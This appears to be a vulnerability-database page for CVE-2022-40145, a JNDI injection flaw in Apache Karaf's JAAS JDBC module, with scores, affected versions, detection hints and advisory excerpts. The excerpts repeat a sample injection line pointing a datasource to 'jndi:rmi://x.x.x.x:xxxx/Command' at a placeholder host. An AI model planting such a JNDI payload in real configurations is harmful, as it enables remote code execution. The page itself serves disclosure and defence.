CVE-2022-40145
published 2022-12-21CVE-2022-40145: This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function…
PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
2.40%
82.0th percentile
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | karaf | < 4.3.8 | 4.3.8 |
| apache | karaf | >= 4.4.0 < 4.4.2 | 4.4.2 |
| apache_software_foundation | apache_karaf | < 4.3.8 | 4.3.8 |
| apache_software_foundation | apache_karaf | >= 4.4.0 < 4.4.2 | 4.4.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for JNDI RMI or LDAP URIs supplied as JDBC datasource configuration values in Apache Karaf JAAS JDBC login module options (JDBCUtils.DATASOURCE), particularly schemes such as jndi:rmi:// or jndi:ldap:// pointing to external hosts. ↗
- →Audit calls to InitialContext.lookup(jndiName) within org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource for unsanitised, externally-controlled JNDI names — absence of input filtering here is the root cause of the RCE. ↗
- →Flag outbound RMI (TCP/1099 or high ephemeral RMI ports) and LDAP (TCP/389, TCP/636) connections originating from Apache Karaf JVM processes, which may indicate JNDI injection exploitation in progress. ↗
- ·Exploitation requires the attacker to already control the target LDAP/RMI server referenced in the JNDI URI; this is a prerequisite that reduces exploitability compared to fully unauthenticated RCE. ↗
- ·All Apache Karaf versions up to and including 4.4.1 and 4.3.7 are affected; versions 4.4.2 and 4.3.8 contain the fix. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Apache Karaf vulnerable to potential code injection
osv·2022-12-21
CVE-2022-40145 [CRITICAL] Apache Karaf vulnerable to potential code injection
Apache Karaf vulnerable to potential code injection
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maint
GHSA
Apache Karaf vulnerable to potential code injection
ghsa·2022-12-21
CVE-2022-40145 [CRITICAL] CWE-20 Apache Karaf vulnerable to potential code injection
Apache Karaf vulnerable to potential code injection
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maint
Red Hat
karaf: JDBC JAAS LDAP injection
vendor_redhat·2022-12-21·CVSS 9.8
CVE-2022-40145 [CRITICAL] CWE-20 karaf: JDBC JAAS LDAP injection
karaf: JDBC JAAS LDAP injection
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage the users to upgrade t
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2022-12-21
Published